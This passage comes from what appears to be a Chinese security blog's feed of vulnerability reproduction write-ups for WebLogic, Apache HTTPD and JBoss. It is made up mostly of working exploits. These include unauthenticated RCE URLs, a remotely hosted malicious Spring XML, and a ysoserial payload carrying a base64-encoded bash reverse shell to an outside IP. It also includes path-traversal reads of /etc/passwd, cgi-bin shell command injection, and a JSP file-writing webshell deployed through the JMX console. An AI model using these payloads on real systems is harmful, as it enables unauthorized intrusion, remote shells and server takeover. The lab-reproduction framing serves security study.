请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP:7001/console/images/%252E./console.portal<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><h4 id="CVE-2020-14883-权限绕过漏洞"><a href="#CVE-2020-14883-权限绕过漏洞" class="headerlink" title="CVE-2020-14883: 权限绕过漏洞"></a>CVE-2020-14883: 权限绕过漏洞</h4><p>远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console。<br>权限绕过漏洞(CVE-2020-14882),访问以下URL,未授权访问到管理后台页面(低权限的用户):</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP:7001/console/css/%252e%252e%252fconsole.portal<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2722623180160.png"></p><center>发现我们现在是低权限的用户,无法安装应用,所以组合下面的CVE-2020-14882 可以继续利用</center><hr><h4 id="CVE-2020-14882-代码执行漏洞"><a href="#CVE-2020-14882-代码执行漏洞" class="headerlink" title="CVE-2020-14882: 代码执行漏洞"></a>CVE-2020-14882: 代码执行漏洞</h4><p>首先通过非法字符绕过访问,然后通过Gadget启动命令执行,poc如下</p><pre class="line-numbers language-none"><code class="language-none">GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1Host: 192.168.3.189:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: ADMUpgrade-Insecure-Requests: 1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201030232437984_680.png"><br>可以发现弹出计算器了<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030232257621_24179.png"><br>修复建议<br>下载最新补丁<br>Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆<a href="https://support.oracle.com后,可以下载最新补丁./">https://support.oracle.com后,可以下载最新补丁。</a></p><hr><h2 id="linux下Weblogic-CVE-2020-14882,CVE-2020-14883"><a href="#linux下Weblogic-CVE-2020-14882,CVE-2020-14883" class="headerlink" title="linux下Weblogic(CVE-2020-14882,CVE-2020-14883)"></a>linux下Weblogic(CVE-2020-14882,CVE-2020-14883)</h2><p> Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全代表@voidfyoo提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。</p><p> CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个细分组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。</p><h3 id="环境搭建-1"><a href="#环境搭建-1" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>使用vulhub<code>docker-compose up -d</code><br>启动完成后,访问<a href="http://your-ip:7001/console%E5%8D%B3%E5%8F%AF%E6%9F%A5%E7%9C%8B%E5%88%B0%E5%90%8E%E5%8F%B0%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%E3%80%82">http://your-ip:7001/console即可查看到后台登录页面。</a></p><h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>首先测试权限绕过突破(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:<br><code>http://your-ip:7001/console/css/%252e%252e%252fconsole.portal</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103154530307_25132.png"><br>访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103154625824_20719.png"><br>此时需要利用到第二个突破CVE-2020-14883。这个突破的利用方式有两种:<br>一是通过<code>com.tangosol.coherence.mvel2.sh.ShellSession</code><br>二是通过<code>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</code><br>直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:</p><pre class="line-numbers language-none"><code class="language-none">http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>进入容器,可以发现touch /tmp/success1已成功执行:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103155601050_1486.png"><br>这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在<code>com.tangosol.coherence.mvel2.sh.ShellSession</code>类。<br><code>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</code>是一种更为通杀的方法,最初在CVE-2019-2725被提出,对于所有Weblogic版本均有效。</p><p><strong>首先,我们需要构造一个XML文件,将其保存在Weblogic可以访问到的服务器上,如<a href="http://8.210.235.249/RCE.xml%EF%BC%9A">http://8.210.235.249/RCE.xml:</a></strong></p><pre class="line-numbers language-xml" data-language="xml"><code class="language-xml"><span class="token prolog"><?xml version="1.0" encoding="UTF-8" ?></span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>beans</span> <span class="token attr-name">xmlns</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://www.springframework.org/schema/beans<span class="token punctuation">"</span></span> <span class="token attr-name"><span class="token namespace">xmlns:</span>xsi</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://www.w3.org/2001/XMLSchema-instance<span class="token punctuation">"</span></span> <span class="token attr-name"><span class="token namespace">xsi:</span>schemaLocation</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd<span class="token punctuation">"</span></span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>bean</span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>pb<span class="token punctuation">"</span></span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>java.lang.ProcessBuilder<span class="token punctuation">"</span></span> <span class="token attr-name">init-method</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>start<span class="token punctuation">"</span></span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>constructor-arg</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>list</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>value</span><span class="token punctuation">></span></span>bash<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>value</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>value</span><span class="token punctuation">></span></span>-c<span class="token tag"><span class="token tag"><span class="token punctuation"></</span>value</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span>value</span><span class="token punctuation">></span></span><span class="token cdata"><![CDATA[touch /tmp/success2]]></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>value</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span>list</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span>constructor-arg</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span>bean</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>beans</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p>然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:</p><pre class="line-numbers language-none"><code class="language-none">http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.210.235.249/RCE.xml")")<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>可以使用python启动一起web服务(高效,快速,直观)<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103160222148_3626.png"><br>加载恶意xml成功<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607255_20201103160351700_16604.png"><br>这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML。</p><hr><h3 id="反弹shell的一些坑"><a href="#反弹shell的一些坑" class="headerlink" title="反弹shell的一些坑"></a>反弹shell的一些坑</h3><p>Linux反弹shell方法:使用加载恶意xml反弹shell<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607276_20201103161545603_3774.png"></p><pre class="line-numbers language-none"><code class="language-none">http://106.75.229.39:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://your-ip/RCE.xml%22)<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607276_20201103163050170_8883.png"></p><p>windows暂时没成功,很多大佬说的回显我也没成功。</p><p>参考:<br><code>https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg</code><br><code>https://blog.csdn.net/HezhezhiyuLe/article/details/95960479</code><br><code>https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md</code></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> weblogic </tag>
<tag> CVE-2020-14750 </tag>
<tag> CVE-2020-14882 </tag>
<tag> CVE-2020-14883 </tag>
</tags>
</entry>
<entry>
<title>apache 解析漏洞(CVE-2017-15715)</title>
<link href="/article/1c1cce96.html"/>
<url>/article/1c1cce96.html</url>
<content type="html"><![CDATA[<h2 id="CVE-2017-15715"><a href="#CVE-2017-15715" class="headerlink" title="CVE-2017-15715"></a>CVE-2017-15715</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>一、漏洞描述</h3><p>Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。</p><h3 id="二、环境搭建"><a href="#二、环境搭建" class="headerlink" title="二、环境搭建"></a>二、环境搭建</h3><p>使用Vulhub</p><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h3><p>上传一个名为six.php的文件,被拦截:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200907160230876_29113.png" alt="img"><br><strong>在1.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截:</strong><br>修改后</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200908100228730_20905.png" alt="img"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200908100418532_11097.png" alt="img"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Apache HTTPD </tag>
<tag> CVE-2017-15715 </tag>
</tags>
</entry>
<entry>
<title>Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)</title>
<link href="/article/3ec89881.html"/>
<url>/article/3ec89881.html</url>
<content type="html"><![CDATA[<h2 id="Apache-HTTP-Server-2-4-49-路径穿越漏洞-CVE-2021-41773"><a href="#Apache-HTTP-Server-2-4-49-路径穿越漏洞-CVE-2021-41773" class="headerlink" title="Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)"></a>Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)</h2><h3 id="一、漏洞简介"><a href="#一、漏洞简介" class="headerlink" title="一、漏洞简介"></a>一、漏洞简介</h3><p>Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:<br>版本等于2.4.49<br>穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)<br>攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。</p><p><strong>参考链接:</strong></p><ul><li><a href="https://httpd.apache.org/security/vulnerabilities_24.html">https://httpd.apache.org/security/vulnerabilities_24.html</a></li><li><a href="https://twitter.com/ptswarm/status/1445376079548624899">https://twitter.com/ptswarm/status/1445376079548624899</a></li><li><a href="https://twitter.com/HackerGautam/status/1445412108863041544">https://twitter.com/HackerGautam/status/1445412108863041544</a></li><li><a href="https://twitter.com/snyff/status/1445565903161102344">https://twitter.com/snyff/status/1445565903161102344</a></li><li><a href="https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md</a></li></ul><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="二、漏洞复现"></a>二、漏洞复现</h3><p>使用如下CURL命令来发送Payload(注意其中的/icons/必须是一个存在且可访问的目录):<br><code>curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</code></p><pre class="line-numbers language-none"><code class="language-none">GET //icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 106.55.147.147:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: zh-CN,en;q=0.5Accept-Encoding: gzip, deflateConnection: closePragma: no-cacheCache-Control: no-cache<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2871523259279.png"></p><p>在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:<br><code>curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</code><br><code>curl -v --data "echo;id" -x 127.0.0.1:8080 'http://106.55.147.147:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</code><br>-x 代表代理</p><pre class="line-numbers language-none"><code class="language-none">POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1Host: Your ip:8080User-Agent: curl/7.64.1Accept: */*Content-Length: 7Content-Type: application/x-www-form-urlencodedConnection: closeecho;id<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/198315816802.png"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Apache HTTPD </tag>
<tag> CVE-2021-41773 </tag>
</tags>
</entry>
<entry>
<title>JBOSS CVE-2017-12149</title>
<link href="/article/c3936183.html"/>
<url>/article/c3936183.html</url>
<content type="html"><![CDATA[<p>[toc]</p><h2 id="JBOSS-CVE-2017-12149复现"><a href="#JBOSS-CVE-2017-12149复现" class="headerlink" title="JBOSS CVE-2017-12149复现"></a>JBOSS CVE-2017-12149复现</h2><h3 id="一、影响范围"><a href="#一、影响范围" class="headerlink" title="一、影响范围"></a>一、影响范围</h3><p>漏洞影响5.x和6.x版本的JBOSS AS。</p><h3 id="二、漏洞原理"><a href="#二、漏洞原理" class="headerlink" title="二、漏洞原理"></a>二、漏洞原理</h3><p>JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,2006年,JBoss被Redhat公司收购。</p><p>2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。</p><h3 id="三、攻击过程"><a href="#三、攻击过程" class="headerlink" title="三、攻击过程"></a>三、攻击过程</h3><p>访问漏洞环境<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102825405_8279.png"><br>访问访问<a href="http://8.210.152.234:8080//invoker/readonly">http://8.210.152.234:8080//invoker/readonly</a> 页面返回500错误 ,基本可以判断存在此漏洞<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102314863_29332.png"></p><h4 id="1-开启nc监听"><a href="#1-开启nc监听" class="headerlink" title="1.开启nc监听"></a>1.开启nc监听</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102937678_15577.png"></p><h4 id="2-生成反弹shell命令"><a href="#2-生成反弹shell命令" class="headerlink" title="2.生成反弹shell命令"></a>2.生成反弹shell命令</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907103148639_996.png"></p><h4 id="3-反弹shell命令转换以后得到密令如下"><a href="#3-反弹shell命令转换以后得到密令如下" class="headerlink" title="3.反弹shell命令转换以后得到密令如下"></a>3.反弹shell命令转换以后得到密令如下</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907103459983_28482.png"></p><h4 id="4-序列化数据生成"><a href="#4-序列化数据生成" class="headerlink" title="4.序列化数据生成"></a>4.序列化数据生成</h4><p>使用ysoserial生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5,如果不成功可以换成CommonsCollections6。1-10 都可以</p><pre class="line-numbers language-none"><code class="language-none">java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" >bb.ser<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907104817445_3967.png"><br>将文件发送到服务器中(建议使用curl,曾经尝试使用burp发送 未成功)<br>命令如下<br><code>curl http://8.210.169.237:8080//invoker/readonly --data-binary @cs.ser</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907104950059_18821.png"></p><h4 id="5-发送完成shell到手"><a href="#5-发送完成shell到手" class="headerlink" title="5.发送完成shell到手"></a>5.发送完成shell到手</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907105040493_6371.png"></p><h3 id="三、一键利用工具推荐"><a href="#三、一键利用工具推荐" class="headerlink" title="三、一键利用工具推荐"></a>三、一键利用工具推荐</h3><p><code>https://github.com/yunxu1/jboss-_CVE-2017-12149</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907105427737_25318.png"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> JBOSS </tag>
<tag> CVE-2017-12149 </tag>
</tags>
</entry>
<entry>
<title>Jboss CVE-2017-7504</title>
<link href="/article/45a5e5d3.html"/>
<url>/article/45a5e5d3.html</url>
<content type="html"><![CDATA[<p>[toc]</p><h2 id="JBOSSMQ-JMS-CVE-2017-7504-集群反序列化漏洞-4-X"><a href="#JBOSSMQ-JMS-CVE-2017-7504-集群反序列化漏洞-4-X" class="headerlink" title="JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X"></a>JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X</h2><h3 id="0x01漏洞描述"><a href="#0x01漏洞描述" class="headerlink" title="0x01漏洞描述"></a>0x01漏洞描述</h3><p>JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。</p><h3 id="0x02影响版本"><a href="#0x02影响版本" class="headerlink" title="0x02影响版本"></a>0x02影响版本</h3><p>JBoss AS 4.x及之前版本</p><h3 id="0x03漏洞利用"><a href="#0x03漏洞利用" class="headerlink" title="0x03漏洞利用"></a>0x03漏洞利用</h3><hr><p>1、首先验证目标jboss是否存在此漏洞,直接访问<br>/jbossmq-httpil/HTTPServerILServlet 路径下。若访问200或下载,则可能存在漏洞。<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208220941482_14194.png"><br>此处我们使用<a href="https://github.com/joaomatosf/JavaDeserH2HC">JavaDeserH2HC</a>工具来利用该漏洞,尝试直接弹回一个shell<br>注意:这个工具在linux系统使用</p><pre class="line-numbers language-none"><code class="language-none">javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 反弹的IP:端口curl http://目标IP:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ReverseShellCommonsCollectionsHashMap.ser<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre><p><strong>端口监听:</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208221156161_24717.png"><br>反弹shell成功<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208221425595_28775.png"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> JBOSS </tag>
<tag> CVE-2017-7504 </tag>
</tags>
</entry>
<entry>
<title>Jboss JMX Console未授权访问Getshell</title>
<link href="/article/be1e1f83.html"/>
<url>/article/be1e1f83.html</url>
<content type="html"><![CDATA[<p>[toc]</p><h2 id="Jboss-JMX-Console未授权访问Getshell"><a href="#Jboss-JMX-Console未授权访问Getshell" class="headerlink" title="Jboss JMX Console未授权访问Getshell"></a>Jboss JMX Console未授权访问Getshell</h2><h3 id="漏洞描述:"><a href="#漏洞描述:" class="headerlink" title="漏洞描述:"></a>漏洞描述:</h3><p>由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能</p><h3 id="影响版本:"><a href="#影响版本:" class="headerlink" title="影响版本:"></a>影响版本:</h3><p>Jboss4.x以下版本。</p><h3 id="利用方式:"><a href="#利用方式:" class="headerlink" title="利用方式:"></a>利用方式:</h3><blockquote><p>Jboxx4.x /jmx-console/ 后台存在未授权访问,进入后台后,可直接部署 war 包Getshell。若需登录,可以尝试爆破弱口令登录(类似于tomcat的War包配置漏洞)</p></blockquote><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建:"></a>环境搭建:</h3><h4 id="0x01-使用docker搭建漏洞环境"><a href="#0x01-使用docker搭建漏洞环境" class="headerlink" title="0x01:使用docker搭建漏洞环境"></a>0x01:使用docker搭建漏洞环境</h4><blockquote><p>一键安装Docker<br>这是推荐方式。在未安装过Docker的机器上,root权限执行如下命令即可一键安装最新版Docker:<br>curl -s <a href="https://get.docker.com/">https://get.docker.com/</a> | sh </p></blockquote><p>1、搜索漏洞环境:</p><pre class="line-numbers language-none"><code class="language-none">sudo docker search testjboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5759958140263.png"><br>2、拉取镜像:</p><pre class="line-numbers language-none"><code class="language-none">sudo docker pull testjboss/jboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3844100168689.png"><br>3、查看现有的docker环境</p><pre class="line-numbers language-none"><code class="language-none">sudo docker images<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1123202156556.png"><br>4、运行环境,访问<a href="http://ip即可/">http://ip即可</a></p><pre class="line-numbers language-none"><code class="language-none">sudo docker run -p 80:8080 -d testjboss/jboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><hr><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现:"></a>漏洞复现:</h3><h4 id="Method-1"><a href="#Method-1" class="headerlink" title="Method 1:"></a>Method 1:</h4><p><a href="http://your/">http://Your</a> IP/jmx-console 直接访问jboss控制台</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>url中的参数:arg0代表war包的名称,arg1=文件名称,arg2=文件后缀名,arg3=文件内容<br>url解码为:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><strong>功能是写入文件,f=文件名,t=文件内容</strong></p><p>写入hack.txt文件</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/August/shell.jsp?f=hack.txt&t=Are you script boy<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5198123176722.png"><br>访问hack.txt文件<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/758824169391.png"></p><hr><h4 id="Method-2"><a href="#Method-2" class="headerlink" title="Method 2:"></a>Method 2:</h4><p>首先制作一个war木马(需要jdk),在jsp小马目录下cmd执行:</p><pre class="line-numbers language-none"><code class="language-none">jar cvf shell.war test.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3179648165946.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/911249179580.png"><br>若报拒绝访问错误,请使用管理员权限运行cmd<br><strong>将war包放在自己的WEB服务器上</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 -m http.server 777 #使用python起临时web服务 端口为777<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/4961950174686.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/4532151155927.png" alt="\\"></p><hr><p>Jboxx4.x /jmx-console/ 后台存在未授权访问,进入后台后,可直接部署 war 包Getshell。若需登录,可以尝试爆破弱口令登录。<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1174650177184.png"><br>然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1104253178367.png"><br> 也可以直接输入URL进入:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="vx_images/4759354173503.png"><br>找到页面中的void addURL()选项来远程加载war包来部署。<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5814456160183.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3690404160713.png"><br>查看部署是否成功<br>返回到刚进入jmx-console的页面,找到 jboss.web.deployment,如下说明部署成功。如果没显示,多刷新几次页面或者等会儿,直到看到有部署的war包即可</p><h3 id="检测工具"><a href="#检测工具" class="headerlink" title="检测工具:"></a>检测工具:</h3><p>检测工具:jexboss,一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。<br>使用:</p><pre class="line-numbers language-none"><code class="language-none">python jexboss.py -u http://ip:port<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img 